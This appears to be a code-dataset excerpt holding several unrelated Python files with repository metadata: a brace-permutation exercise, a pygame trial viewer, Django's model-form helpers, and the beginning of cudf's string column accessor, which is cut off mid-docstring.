def permutations0(open_braces, close_braces, permutation):
if not open_braces and not close_braces:
return print(permutation)
if open_braces:
permutations0(open_braces - 1, close_braces, permutation + "{")
if close_braces and open_braces < close_braces :
permutations0(open_braces, close_braces - 1, permutation + "}")
def permutations1(open_braces, close_braces, permutation):
if not open_braces and not close_braces:
return [permutation]
permutations = []
if open_braces:
permutations += permutations1(open_braces - 1, close_braces, permutation + "{")
if close_braces and open_braces < close_braces :
permutations += permutations1(open_braces, close_braces - 1, permutation + "}")
return permutations
if __name__ == '__main__':
n = int(input(f'Enter N: '))
open_braces = close_braces = n
permutations0(open_braces, close_braces, '')
perm = permutations1(open_braces, close_braces, '')
print(perm)
| 27.380952 | 87 | 0.688696 |
acfa9cbb00af08454225f7c20329f7aa621f2745 | 436 | py | Python | initial-frames/viewTrial.py | kasmith/cbmm-project-christmas | 2543eaf9ab57f31d68fef8a9f5d629ce0116ca1a | [
"MIT"
] | null | null | null | initial-frames/viewTrial.py | kasmith/cbmm-project-christmas | 2543eaf9ab57f31d68fef8a9f5d629ce0116ca1a | [
"MIT"
] | null | null | null | initial-frames/viewTrial.py | kasmith/cbmm-project-christmas | 2543eaf9ab57f31d68fef8a9f5d629ce0116ca1a | [
"MIT"
] | null | null | null | from __future__ import division
from physicsTable import *
from physicsTable.constants import *
import pygame as pg
from pygame.constants import *
import sys
if __name__ == '__main__':
if len(sys.argv) < 2:
raise Exception('Need to load a trial from file path')
tr = loadTrial(sys.argv[1])
pg.init()
sc = pg.display.set_mode((1000,620))
tb = tr.makeTable()
tb.demonstrate()
| 20.761905 | 62 | 0.644495 |
acfa9cec3e68ce0d6e58d2daed7670183dee3718 | 28,578 | py | Python | app/django/forms/models.py | jamslevy/gsoc | e995e1a8d34e0291ab988ba501ae4efc61f9516d | [
"Apache-2.0"
] | 1 | 2016-05-09T14:43:53.000Z | 2016-05-09T14:43:53.000Z | app/django/forms/models.py | jamslevy/gsoc | e995e1a8d34e0291ab988ba501ae4efc61f9516d | [
"Apache-2.0"
] | null | null | null | app/django/forms/models.py | jamslevy/gsoc | e995e1a8d34e0291ab988ba501ae4efc61f9516d | [
"Apache-2.0"
] | null | null | null | """
Helper functions for creating Form classes from Django models
and database field objects.
"""
from django.utils.encoding import smart_unicode
from django.utils.datastructures import SortedDict
from django.utils.text import get_text_list, capfirst
from django.utils.translation import ugettext_lazy as _
from util import ValidationError, ErrorList
from forms import BaseForm, get_declared_fields
from fields import Field, ChoiceField, IntegerField, EMPTY_VALUES
from widgets import Select, SelectMultiple, HiddenInput, MultipleHiddenInput
from widgets import media_property
from formsets import BaseFormSet, formset_factory, DELETION_FIELD_NAME
try:
set
except NameError:
from sets import Set as set # Python 2.3 fallback
__all__ = (
'ModelForm', 'BaseModelForm', 'model_to_dict', 'fields_for_model',
'save_instance', 'form_for_fields', 'ModelChoiceField',
'ModelMultipleChoiceField',
)
def save_instance(form, instance, fields=None, fail_message='saved',
commit=True, exclude=None):
"""
Saves bound Form ``form``'s cleaned_data into model instance ``instance``.
If commit=True, then the changes to ``instance`` will be saved to the
database. Returns ``instance``.
"""
from django.db import models
opts = instance._meta
if form.errors:
raise ValueError("The %s could not be %s because the data didn't"
" validate." % (opts.object_name, fail_message))
cleaned_data = form.cleaned_data
for f in opts.fields:
if not f.editable or isinstance(f, models.AutoField) \
or not f.name in cleaned_data:
continue
if fields and f.name not in fields:
continue
if exclude and f.name in exclude:
continue
f.save_form_data(instance, cleaned_data[f.name])
# Wrap up the saving of m2m data as a function.
def save_m2m():
opts = instance._meta
cleaned_data = form.cleaned_data
for f in opts.many_to_many:
if fields and f.name not in fields:
continue
if f.name in cleaned_data:
f.save_form_data(instance, cleaned_data[f.name])
if commit:
# If we are committing, save the instance and the m2m data immediately.
instance.save()
save_m2m()
else:
# We're not committing. Add a method to the form to allow deferred
# saving of m2m data.
form.save_m2m = save_m2m
return instance
def make_model_save(model, fields, fail_message):
"""Returns the save() method for a Form."""
def save(self, commit=True):
return save_instance(self, model(), fields, fail_message, commit)
return save
def make_instance_save(instance, fields, fail_message):
"""Returns the save() method for a Form."""
def save(self, commit=True):
return save_instance(self, instance, fields, fail_message, commit)
return save
def form_for_fields(field_list):
"""
Returns a Form class for the given list of Django database field instances.
"""
fields = SortedDict([(f.name, f.formfield())
for f in field_list if f.editable])
return type('FormForFields', (BaseForm,), {'base_fields': fields})
# ModelForms #################################################################
def model_to_dict(instance, fields=None, exclude=None):
"""
Returns a dict containing the data in ``instance`` suitable for passing as
a Form's ``initial`` keyword argument.
``fields`` is an optional list of field names. If provided, only the named
fields will be included in the returned dict.
``exclude`` is an optional list of field names. If provided, the named
fields will be excluded from the returned dict, even if they are listed in
the ``fields`` argument.
"""
# avoid a circular import
from django.db.models.fields.related import ManyToManyField, OneToOneField
opts = instance._meta
data = {}
for f in opts.fields + opts.many_to_many:
if not f.editable:
continue
if fields and not f.name in fields:
continue
if exclude and f.name in exclude:
continue
if isinstance(f, ManyToManyField):
# If the object doesn't have a primry key yet, just use an empty
# list for its m2m fields. Calling f.value_from_object will raise
# an exception.
if instance.pk is None:
data[f.name] = []
else:
# MultipleChoiceWidget needs a list of pks, not object instances.
data[f.name] = [obj.pk for obj in f.value_from_object(instance)]
else:
data[f.name] = f.value_from_object(instance)
return data
def fields_for_model(model, fields=None, exclude=None, formfield_callback=lambda f: f.formfield()):
"""
Returns a ``SortedDict`` containing form fields for the given model.
``fields`` is an optional list of field names. If provided, only the named
fields will be included in the returned fields.
``exclude`` is an optional list of field names. If provided, the named
fields will be excluded from the returned fields, even if they are listed
in the ``fields`` argument.
"""
# TODO: if fields is provided, it would be nice to return fields in that order
field_list = []
opts = model._meta
for f in opts.fields + opts.many_to_many:
if not f.editable:
continue
if fields and not f.name in fields:
continue
if exclude and f.name in exclude:
continue
formfield = formfield_callback(f)
if formfield:
field_list.append((f.name, formfield))
return SortedDict(field_list)
class ModelFormOptions(object):
def __init__(self, options=None):
self.model = getattr(options, 'model', None)
self.fields = getattr(options, 'fields', None)
self.exclude = getattr(options, 'exclude', None)
class ModelFormMetaclass(type):
def __new__(cls, name, bases, attrs):
formfield_callback = attrs.pop('formfield_callback',
lambda f: f.formfield())
try:
parents = [b for b in bases if issubclass(b, ModelForm)]
except NameError:
# We are defining ModelForm itself.
parents = None
declared_fields = get_declared_fields(bases, attrs, False)
new_class = super(ModelFormMetaclass, cls).__new__(cls, name, bases,
attrs)
if not parents:
return new_class
if 'media' not in attrs:
new_class.media = media_property(new_class)
opts = new_class._meta = ModelFormOptions(getattr(new_class, 'Meta', None))
if opts.model:
# If a model is defined, extract form fields from it.
fields = fields_for_model(opts.model, opts.fields,
opts.exclude, formfield_callback)
# Override default model fields with any custom declared ones
# (plus, include all the other declared fields).
fields.update(declared_fields)
else:
fields = declared_fields
new_class.declared_fields = declared_fields
new_class.base_fields = fields
return new_class
class BaseModelForm(BaseForm):
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, label_suffix=':',
empty_permitted=False, instance=None):
opts = self._meta
if instance is None:
# if we didn't get an instance, instantiate a new one
self.instance = opts.model()
object_data = {}
else:
self.instance = instance
object_data = model_to_dict(instance, opts.fields, opts.exclude)
# if initial was provided, it should override the values from instance
if initial is not None:
object_data.update(initial)
super(BaseModelForm, self).__init__(data, files, auto_id, prefix, object_data,
error_class, label_suffix, empty_permitted)
def clean(self):
self.validate_unique()
return self.cleaned_data
def validate_unique(self):
from django.db.models.fields import FieldDoesNotExist
# Gather a list of checks to perform. Since this is a ModelForm, some
# fields may have been excluded; we can't perform a unique check on a
# form that is missing fields involved in that check.
unique_checks = []
for check in self.instance._meta.unique_together[:]:
fields_on_form = [field for field in check if field in self.fields]
if len(fields_on_form) == len(check):
unique_checks.append(check)
form_errors = []
# Gather a list of checks for fields declared as unique and add them to
# the list of checks. Again, skip fields not on the form.
for name, field in self.fields.items():
try:
f = self.instance._meta.get_field_by_name(name)[0]
except FieldDoesNotExist:
# This is an extra field that's not on the ModelForm, ignore it
continue
# MySQL can't handle ... WHERE pk IS NULL, so make sure we
# don't generate queries of that form.
is_null_pk = f.primary_key and self.cleaned_data[name] is None
if name in self.cleaned_data and f.unique and not is_null_pk:
unique_checks.append((name,))
# Don't run unique checks on fields that already have an error.
unique_checks = [check for check in unique_checks if not [x in self._errors for x in check if x in self._errors]]
bad_fields = set()
for unique_check in unique_checks:
# Try to look up an existing object with the same values as this
# object's values for all the unique field.
lookup_kwargs = {}
for field_name in unique_check:
lookup_kwargs[field_name] = self.cleaned_data[field_name]
qs = self.instance.__class__._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if self.instance.pk is not None:
qs = qs.exclude(pk=self.instance.pk)
# This cute trick with extra/values is the most efficient way to
# tell if a particular query returns any results.
if qs.extra(select={'a': 1}).values('a').order_by():
model_name = capfirst(self.instance._meta.verbose_name)
# A unique field
if len(unique_check) == 1:
field_name = unique_check[0]
field_label = self.fields[field_name].label
# Insert the error into the error dict, very sneaky
self._errors[field_name] = ErrorList([
_(u"%(model_name)s with this %(field_label)s already exists.") % \
{'model_name': unicode(model_name),
'field_label': unicode(field_label)}
])
# unique_together
else:
field_labels = [self.fields[field_name].label for field_name in unique_check]
field_labels = get_text_list(field_labels, _('and'))
form_errors.append(
_(u"%(model_name)s with this %(field_label)s already exists.") % \
{'model_name': unicode(model_name),
'field_label': unicode(field_labels)}
)
# Mark these fields as needing to be removed from cleaned data
# later.
for field_name in unique_check:
bad_fields.add(field_name)
for field_name in bad_fields:
del self.cleaned_data[field_name]
if form_errors:
# Raise the unique together errors since they are considered
# form-wide.
raise ValidationError(form_errors)
def save(self, commit=True):
"""
Saves this ``form``'s cleaned_data into model instance
``self.instance``.
If commit=True, then the changes to ``instance`` will be saved to the
database. Returns ``instance``.
"""
if self.instance.pk is None:
fail_message = 'created'
else:
fail_message = 'changed'
return save_instance(self, self.instance, self._meta.fields, fail_message, commit)
class ModelForm(BaseModelForm):
__metaclass__ = ModelFormMetaclass
def modelform_factory(model, form=ModelForm, fields=None, exclude=None,
formfield_callback=lambda f: f.formfield()):
# HACK: we should be able to construct a ModelForm without creating
# and passing in a temporary inner class
class Meta:
pass
setattr(Meta, 'model', model)
setattr(Meta, 'fields', fields)
setattr(Meta, 'exclude', exclude)
class_name = model.__name__ + 'Form'
return ModelFormMetaclass(class_name, (form,), {'Meta': Meta,
'formfield_callback': formfield_callback})
# ModelFormSets ##############################################################
class BaseModelFormSet(BaseFormSet):
"""
A ``FormSet`` for editing a queryset and/or adding new objects to it.
"""
model = None
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
queryset=None, **kwargs):
self.queryset = queryset
defaults = {'data': data, 'files': files, 'auto_id': auto_id, 'prefix': prefix}
defaults['initial'] = [model_to_dict(obj) for obj in self.get_queryset()]
defaults.update(kwargs)
super(BaseModelFormSet, self).__init__(**defaults)
def _construct_form(self, i, **kwargs):
if i < self._initial_form_count:
kwargs['instance'] = self.get_queryset()[i]
return super(BaseModelFormSet, self)._construct_form(i, **kwargs)
def get_queryset(self):
if not hasattr(self, '_queryset'):
if self.queryset is not None:
qs = self.queryset
else:
qs = self.model._default_manager.get_query_set()
if self.max_num > 0:
self._queryset = qs[:self.max_num]
else:
self._queryset = qs
return self._queryset
def save_new(self, form, commit=True):
"""Saves and returns a new model instance for the given form."""
return save_instance(form, self.model(), exclude=[self._pk_field.name], commit=commit)
def save_existing(self, form, instance, commit=True):
"""Saves and returns an existing model instance for the given form."""
return save_instance(form, instance, exclude=[self._pk_field.name], commit=commit)
def save(self, commit=True):
"""Saves model instances for every form, adding and changing instances
as necessary, and returns the list of instances.
"""
if not commit:
self.saved_forms = []
def save_m2m():
for form in self.saved_forms:
form.save_m2m()
self.save_m2m = save_m2m
return self.save_existing_objects(commit) + self.save_new_objects(commit)
def save_existing_objects(self, commit=True):
self.changed_objects = []
self.deleted_objects = []
if not self.get_queryset():
return []
# Put the objects from self.get_queryset into a dict so they are easy to lookup by pk
existing_objects = {}
for obj in self.get_queryset():
existing_objects[obj.pk] = obj
saved_instances = []
for form in self.initial_forms:
obj = existing_objects[form.cleaned_data[self._pk_field.name]]
if self.can_delete and form.cleaned_data[DELETION_FIELD_NAME]:
self.deleted_objects.append(obj)
obj.delete()
else:
if form.changed_data:
self.changed_objects.append((obj, form.changed_data))
saved_instances.append(self.save_existing(form, obj, commit=commit))
if not commit:
self.saved_forms.append(form)
return saved_instances
def save_new_objects(self, commit=True):
self.new_objects = []
for form in self.extra_forms:
if not form.has_changed():
continue
# If someone has marked an add form for deletion, don't save the
# object.
if self.can_delete and form.cleaned_data[DELETION_FIELD_NAME]:
continue
self.new_objects.append(self.save_new(form, commit=commit))
if not commit:
self.saved_forms.append(form)
return self.new_objects
def add_fields(self, form, index):
"""Add a hidden field for the object's primary key."""
from django.db.models import AutoField
self._pk_field = pk = self.model._meta.pk
if pk.auto_created or isinstance(pk, AutoField):
form.fields[self._pk_field.name] = IntegerField(required=False, widget=HiddenInput)
super(BaseModelFormSet, self).add_fields(form, index)
def modelformset_factory(model, form=ModelForm, formfield_callback=lambda f: f.formfield(),
formset=BaseModelFormSet,
extra=1, can_delete=False, can_order=False,
max_num=0, fields=None, exclude=None):
"""
Returns a FormSet class for the given Django model class.
"""
form = modelform_factory(model, form=form, fields=fields, exclude=exclude,
formfield_callback=formfield_callback)
FormSet = formset_factory(form, formset, extra=extra, max_num=max_num,
can_order=can_order, can_delete=can_delete)
FormSet.model = model
return FormSet
# InlineFormSets #############################################################
class BaseInlineFormSet(BaseModelFormSet):
"""A formset for child objects related to a parent."""
def __init__(self, data=None, files=None, instance=None,
save_as_new=False, prefix=None):
from django.db.models.fields.related import RelatedObject
self.instance = instance
self.save_as_new = save_as_new
# is there a better way to get the object descriptor?
self.rel_name = RelatedObject(self.fk.rel.to, self.model, self.fk).get_accessor_name()
super(BaseInlineFormSet, self).__init__(data, files, prefix=prefix or self.rel_name)
def _construct_forms(self):
if self.save_as_new:
self._total_form_count = self._initial_form_count
self._initial_form_count = 0
super(BaseInlineFormSet, self)._construct_forms()
def _construct_form(self, i, **kwargs):
form = super(BaseInlineFormSet, self)._construct_form(i, **kwargs)
if self.save_as_new:
# Remove the primary key from the form's data, we are only
# creating new instances
form.data[form.add_prefix(self._pk_field.name)] = None
return form
def get_queryset(self):
"""
Returns this FormSet's queryset, but restricted to children of
self.instance
"""
kwargs = {self.fk.name: self.instance}
return self.model._default_manager.filter(**kwargs)
def save_new(self, form, commit=True):
kwargs = {self.fk.get_attname(): self.instance.pk}
new_obj = self.model(**kwargs)
return save_instance(form, new_obj, exclude=[self._pk_field.name], commit=commit)
def add_fields(self, form, index):
super(BaseInlineFormSet, self).add_fields(form, index)
if self._pk_field == self.fk:
form.fields[self._pk_field.name] = IntegerField(required=False, widget=HiddenInput)
def _get_foreign_key(parent_model, model, fk_name=None):
"""
Finds and returns the ForeignKey from model to parent if there is one.
If fk_name is provided, assume it is the name of the ForeignKey field.
"""
# avoid circular import
from django.db.models import ForeignKey
opts = model._meta
if fk_name:
fks_to_parent = [f for f in opts.fields if f.name == fk_name]
if len(fks_to_parent) == 1:
fk = fks_to_parent[0]
if not isinstance(fk, ForeignKey) or \
(fk.rel.to != parent_model and
fk.rel.to not in parent_model._meta.get_parent_list()):
raise Exception("fk_name '%s' is not a ForeignKey to %s" % (fk_name, parent_model))
elif len(fks_to_parent) == 0:
raise Exception("%s has no field named '%s'" % (model, fk_name))
else:
# Try to discover what the ForeignKey from model to parent_model is
fks_to_parent = [
f for f in opts.fields
if isinstance(f, ForeignKey)
and (f.rel.to == parent_model
or f.rel.to in parent_model._meta.get_parent_list())
]
if len(fks_to_parent) == 1:
fk = fks_to_parent[0]
elif len(fks_to_parent) == 0:
raise Exception("%s has no ForeignKey to %s" % (model, parent_model))
else:
raise Exception("%s has more than 1 ForeignKey to %s" % (model, parent_model))
return fk
def inlineformset_factory(parent_model, model, form=ModelForm,
formset=BaseInlineFormSet, fk_name=None,
fields=None, exclude=None,
extra=3, can_order=False, can_delete=True, max_num=0,
formfield_callback=lambda f: f.formfield()):
"""
Returns an ``InlineFormSet`` for the given kwargs.
You must provide ``fk_name`` if ``model`` has more than one ``ForeignKey``
to ``parent_model``.
"""
fk = _get_foreign_key(parent_model, model, fk_name=fk_name)
# enforce a max_num=1 when the foreign key to the parent model is unique.
if fk.unique:
max_num = 1
if exclude is not None:
exclude = list(exclude)
exclude.append(fk.name)
else:
exclude = [fk.name]
kwargs = {
'form': form,
'formfield_callback': formfield_callback,
'formset': formset,
'extra': extra,
'can_delete': can_delete,
'can_order': can_order,
'fields': fields,
'exclude': exclude,
'max_num': max_num,
}
FormSet = modelformset_factory(model, **kwargs)
FormSet.fk = fk
return FormSet
# Fields #####################################################################
class ModelChoiceIterator(object):
def __init__(self, field):
self.field = field
self.queryset = field.queryset
def __iter__(self):
if self.field.empty_label is not None:
yield (u"", self.field.empty_label)
if self.field.cache_choices:
if self.field.choice_cache is None:
self.field.choice_cache = [
self.choice(obj) for obj in self.queryset.all()
]
for choice in self.field.choice_cache:
yield choice
else:
for obj in self.queryset.all():
yield self.choice(obj)
def choice(self, obj):
if self.field.to_field_name:
# FIXME: The try..except shouldn't be necessary here. But this is
# going in just before 1.0, so I want to be careful. Will check it
# out later.
try:
key = getattr(obj, self.field.to_field_name).pk
except AttributeError:
key = getattr(obj, self.field.to_field_name)
else:
key = obj.pk
return (key, self.field.label_from_instance(obj))
class ModelChoiceField(ChoiceField):
"""A ChoiceField whose choices are a model QuerySet."""
# This class is a subclass of ChoiceField for purity, but it doesn't
# actually use any of ChoiceField's implementation.
default_error_messages = {
'invalid_choice': _(u'Select a valid choice. That choice is not one of'
u' the available choices.'),
}
def __init__(self, queryset, empty_label=u"---------", cache_choices=False,
required=True, widget=None, label=None, initial=None,
help_text=None, to_field_name=None, *args, **kwargs):
self.empty_label = empty_label
self.cache_choices = cache_choices
# Call Field instead of ChoiceField __init__() because we don't need
# ChoiceField.__init__().
Field.__init__(self, required, widget, label, initial, help_text,
*args, **kwargs)
self.queryset = queryset
self.choice_cache = None
self.to_field_name = to_field_name
def _get_queryset(self):
return self._queryset
def _set_queryset(self, queryset):
self._queryset = queryset
self.widget.choices = self.choices
queryset = property(_get_queryset, _set_queryset)
# this method will be used to create object labels by the QuerySetIterator.
# Override it to customize the label.
def label_from_instance(self, obj):
"""
This method is used to convert objects into strings; it's used to
generate the labels for the choices presented by this object. Subclasses
can override this method to customize the display of the choices.
"""
return smart_unicode(obj)
def _get_choices(self):
# If self._choices is set, then somebody must have manually set
# the property self.choices. In this case, just return self._choices.
if hasattr(self, '_choices'):
return self._choices
# Otherwise, execute the QuerySet in self.queryset to determine the
# choices dynamically. Return a fresh QuerySetIterator that has not been
# consumed. Note that we're instantiating a new QuerySetIterator *each*
# time _get_choices() is called (and, thus, each time self.choices is
# accessed) so that we can ensure the QuerySet has not been consumed. This
# construct might look complicated but it allows for lazy evaluation of
# the queryset.
return ModelChoiceIterator(self)
choices = property(_get_choices, ChoiceField._set_choices)
def clean(self, value):
Field.clean(self, value)
if value in EMPTY_VALUES:
return None
try:
key = self.to_field_name or 'pk'
value = self.queryset.get(**{key: value})
except self.queryset.model.DoesNotExist:
raise ValidationError(self.error_messages['invalid_choice'])
return value
class ModelMultipleChoiceField(ModelChoiceField):
"""A MultipleChoiceField whose choices are a model QuerySet."""
widget = SelectMultiple
hidden_widget = MultipleHiddenInput
default_error_messages = {
'list': _(u'Enter a list of values.'),
'invalid_choice': _(u'Select a valid choice. %s is not one of the'
u' available choices.'),
}
def __init__(self, queryset, cache_choices=False, required=True,
widget=None, label=None, initial=None,
help_text=None, *args, **kwargs):
super(ModelMultipleChoiceField, self).__init__(queryset, None,
cache_choices, required, widget, label, initial, help_text,
*args, **kwargs)
def clean(self, value):
if self.required and not value:
raise ValidationError(self.error_messages['required'])
elif not self.required and not value:
return []
if not isinstance(value, (list, tuple)):
raise ValidationError(self.error_messages['list'])
final_values = []
for val in value:
try:
obj = self.queryset.get(pk=val)
except self.queryset.model.DoesNotExist:
raise ValidationError(self.error_messages['invalid_choice'] % val)
else:
final_values.append(obj)
return final_values
| 40.88412 | 121 | 0.615089 |
acfa9d9d39aea7371bab4ac71c8ed78822c469ce | 31,480 | py | Python | python/cudf/cudf/core/column/string.py | mt-jones/cudf | 1a70ee21aacef4c83971ddf14e1df98448b3fb81 | [
"Apache-2.0"
] | null | null | null | python/cudf/cudf/core/column/string.py | mt-jones/cudf | 1a70ee21aacef4c83971ddf14e1df98448b3fb81 | [
"Apache-2.0"
] | null | null | null | python/cudf/cudf/core/column/string.py | mt-jones/cudf | 1a70ee21aacef4c83971ddf14e1df98448b3fb81 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2019-2020, NVIDIA CORPORATION.
import functools
import pickle
import warnings
import numpy as np
import pandas as pd
import pyarrow as pa
import nvstrings
import rmm
import cudf._lib as libcudf
import cudf._libxx as libcudfxx
import cudf._libxx.string_casting as str_cast
from cudf._lib.nvtx import nvtx_range_pop, nvtx_range_push
from cudf._libxx.null_mask import bitmask_allocation_size_bytes
from cudf.core.buffer import Buffer
from cudf.core.column import column
from cudf.utils import utils
from cudf.utils.dtypes import is_list_like
_str_to_numeric_typecast_functions = {
np.dtype("int8"): str_cast.stoi8,
np.dtype("int16"): str_cast.stoi16,
np.dtype("int32"): str_cast.stoi,
np.dtype("int64"): str_cast.stol,
np.dtype("float32"): str_cast.stof,
np.dtype("float64"): str_cast.stod,
np.dtype("bool"): str_cast.to_booleans,
# TODO: support Date32 UNIX days
# np.dtype("datetime64[D]"): nvstrings.nvstrings.timestamp2int,
np.dtype("datetime64[s]"): str_cast.timestamp2int,
np.dtype("datetime64[ms]"): str_cast.timestamp2int,
np.dtype("datetime64[us]"): str_cast.timestamp2int,
np.dtype("datetime64[ns]"): str_cast.timestamp2int,
}
_numeric_to_str_typecast_functions = {
np.dtype("int8"): str_cast.i8tos,
np.dtype("int16"): str_cast.i16tos,
np.dtype("int32"): str_cast.itos,
np.dtype("int64"): str_cast.ltos,
np.dtype("float32"): str_cast.ftos,
np.dtype("float64"): str_cast.dtos,
np.dtype("bool"): str_cast.from_booleans,
# TODO: support Date32 UNIX days
# np.dtype("datetime64[D]"): nvstrings.int2timestamp,
np.dtype("datetime64[s]"): str_cast.int2timestamp,
np.dtype("datetime64[ms]"): str_cast.int2timestamp,
np.dtype("datetime64[us]"): str_cast.int2timestamp,
np.dtype("datetime64[ns]"): str_cast.int2timestamp,
}
class StringMethods(object):
"""
This mimicks pandas `df.str` interface.
"""
def __init__(self, parent, index=None, name=None):
self._parent = parent
self._index = index
self._name = name
def __getattr__(self, attr, *args, **kwargs):
from cudf.core.series import Series
if hasattr(self._parent.nvstrings, attr):
passed_attr = getattr(self._parent.nvstrings, attr)
if callable(passed_attr):
@functools.wraps(passed_attr)
def wrapper(*args, **kwargs):
ret = passed_attr(*args, **kwargs)
if isinstance(ret, nvstrings.nvstrings):
ret = Series(
column.as_column(ret),
index=self._index,
name=self._name,
)
return ret
return wrapper
else:
return passed_attr
else:
raise AttributeError(attr)
def __dir__(self):
keys = dir(type(self))
return set(keys + dir(self._parent.nvstrings))
def len(self):
"""
Computes the length of each element in the Series/Index.
Returns
-------
Series or Index of int: A Series or Index of integer values
indicating the length of each element in the Series or Index.
"""
from cudf.core.series import Series
out_dev_arr = rmm.device_array(len(self._parent), dtype="int32")
ptr = libcudf.cudf.get_ctype_ptr(out_dev_arr)
self._parent.nvstrings.len(ptr)
mask = None
if self._parent.has_nulls:
mask = self._parent.mask
col = column.build_column(
Buffer(out_dev_arr), np.dtype("int32"), mask=mask
)
return Series(col, index=self._index, name=self._name)
def cat(self, others=None, sep=None, na_rep=None):
"""
Concatenate strings in the Series/Index with given separator.
If *others* is specified, this function concatenates the Series/Index
and elements of others element-wise. If others is not passed, then all
values in the Series/Index are concatenated into a single string with
a given sep.
Parameters
----------
others : Series or List of str
Strings to be appended.
The number of strings must match size() of this instance.
This must be either a Series of string dtype or a Python
list of strings.
sep : str
If specified, this separator will be appended to each string
before appending the others.
na_rep : str
This character will take the place of any null strings
(not empty strings) in either list.
- If `na_rep` is None, and `others` is None, missing values in
the Series/Index are omitted from the result.
- If `na_rep` is None, and `others` is not None, a row
containing a missing value in any of the columns (before
concatenation) will have a missing value in the result.
Returns
-------
concat : str or Series/Index of str dtype
If `others` is None, `str` is returned, otherwise a `Series/Index`
(same type as caller) of str dtype is returned.
"""
from cudf.core import Series, Index
if isinstance(others, Series):
assert others.dtype == np.dtype("object")
others = others._column.nvstrings
elif isinstance(others, Index):
assert others.dtype == np.dtype("object")
others = others._values.nvstrings
elif isinstance(others, StringMethods):
"""
If others is a StringMethods then
raise an exception
"""
msg = "series.str is an accessor, not an array-like of strings."
raise ValueError(msg)
elif is_list_like(others) and others:
"""
If others is a list-like object (in our case lists & tuples)
just another Series/Index, great go ahead with concatenation.
"""
"""
Picking first element and checking if it really adheres to
list like conditions, if not we switch to next case
Note: We have made a call not to iterate over the entire list as
it could be more expensive if it was of very large size.
Thus only doing a sanity check on just the first element of list.
"""
first = others[0]
if is_list_like(first) or isinstance(
first, (Series, Index, pd.Series, pd.Index)
):
"""
Internal elements in others list should also be
list-like and not a regular string/byte
"""
first = None
for frame in others:
if not isinstance(frame, Series):
"""
Make sure all inputs to .cat function call
are of type nvstrings so creating a Series object.
"""
frame = Series(frame, dtype="str")
if first is None:
"""
extracting nvstrings pointer since
`frame` is of type Series/Index and
first isn't yet initialized.
"""
first = frame._column.nvstrings
else:
assert frame.dtype == np.dtype("object")
frame = frame._column.nvstrings
first = first.cat(frame, sep=sep, na_rep=na_rep)
others = first
elif not is_list_like(first):
"""
Picking first element and checking if it really adheres to
non-list like conditions.
Note: We have made a call not to iterate over the entire
list as it could be more expensive if it was of very
large size. Thus only doing a sanity check on just the
first element of list.
"""
others = Series(others)
others = others._column.nvstrings
elif isinstance(others, (pd.Series, pd.Index)):
others = Series(others)
others = others._column.nvstrings
data = self._parent.nvstrings.cat(
others=others, sep=sep, na_rep=na_rep
)
out = Series(data, index=self._index, name=self._name)
if len(out) == 1 and others is None:
out = out[0]
return out
def join(self, sep):
"""
Join lists contained as elements in the Series/Index with passed
delimiter.
"""
raise NotImplementedError(
"Columns of arrays / lists are not yet " "supported"
)
def extract(self, pat, flags=0, expand=True):
"""
Extract capture groups in the regex `pat` as columns in a DataFrame.
For each subject string in the Series, extract groups from the first
match of regular expression `pat`.
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
expand : bool, default True
If True, return DataFrame with on column per capture group.
If False, return a Series/Index if there is one capture group or
DataFrame if there are multiple capture groups.
Returns
-------
DataFrame or Series/Index
A DataFrame with one row for each subject string, and one column
for each group. If `expand=False` and `pat` has only one capture
group, then return a Series/Index.
Notes
-----
The `flags` parameter is not yet supported and will raise a
NotImplementedError if anything other than the default value is passed.
"""
if flags != 0:
raise NotImplementedError("`flags` parameter is not yet supported")
from cudf.core import DataFrame, Series
out = self._parent.nvstrings.extract(pat)
if len(out) == 1 and expand is False:
return Series(out[0], index=self._index, name=self._name)
else:
out_df = DataFrame(index=self._index)
for idx, val in enumerate(out):
out_df[idx] = val
return out_df
def contains(self, pat, case=True, flags=0, na=np.nan, regex=True):
"""
Test if pattern or regex is contained within a string of a Series or
Index.
Return boolean Series or Index based on whether a given pattern or
regex is contained within a string of a Series or Index.
Parameters
----------
pat : str
Character sequence or regular expression.
regex : bool, default True
If True, assumes the pattern is a regular expression.
If False, treats the pattern as a literal string.
Returns
-------
Series/Index of bool dtype
A Series/Index of boolean dtype indicating whether the given
pattern is contained within the string of each element of the
Series/Index.
Notes
-----
The parameters `case`, `flags`, and `na` are not yet supported and
will raise a NotImplementedError if anything other than the default
value is set.
"""
if case is not True:
raise NotImplementedError("`case` parameter is not yet supported")
elif flags != 0:
raise NotImplementedError("`flags` parameter is not yet supported")
elif na is not np.nan:
raise NotImplementedError("`na` parameter is not yet supported")
from cudf.core import Series
out_dev_arr = rmm.device_array(len(self._parent), dtype="bool")
ptr = libcudf.cudf.get_ctype_ptr(out_dev_arr)
self._parent.nvstrings.contains(pat, regex=regex, devptr=ptr)
mask = None
if self._parent.has_nulls:
mask = self._parent.mask
col = column.build_column(
Buffer(out_dev_arr), dtype=np.dtype("bool"), mask=mask
)
return Series(col, index=self._index, name=self._name)
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=True):
"""
Replace occurences of pattern/regex in the Series/Index with some other
string.
Parameters
----------
pat : str
String to be replaced as a character sequence or regular
expression.
repl : str
String to be used as replacement.
n : int, default -1 (all)
Number of replacements to make from the start.
regex : bool, default True
If True, assumes the pattern is a regular expression.
If False, treats the pattern as a literal string.
Returns
-------
Series/Index of str dtype
A copy of the object with all matching occurrences of pat replaced
by repl.
Notes
-----
The parameters `case` and `flags` are not yet supported and will raise
a NotImplementedError if anything other than the default value is set.
"""
if case is not None:
raise NotImplementedError("`case` parameter is not yet supported")
elif flags != 0:
raise NotImplementedError("`flags` parameter is not yet supported")
# Pandas treats 0 as all
if n == 0:
n = -1
from cudf.core import Series
return Series(
self._parent.nvstrings.replace(pat, repl, n=n, regex=regex),
index=self._index,
name=self._name,
)
def lower(self):
"""
Convert strings in the Series/Index to lowercase.
Returns
-------
Series/Index of str dtype
A copy of the object with all strings converted to lowercase.
"""
from cudf.core import Series
return Series(
self._parent.nvstrings.lower(), index=self._index, name=self._name
)
def split(self, pat=None, n=-1, expand=True):
"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the beginning, at the
specified delimiter string.
Parameters
----------
pat : str, default ' ' (space)
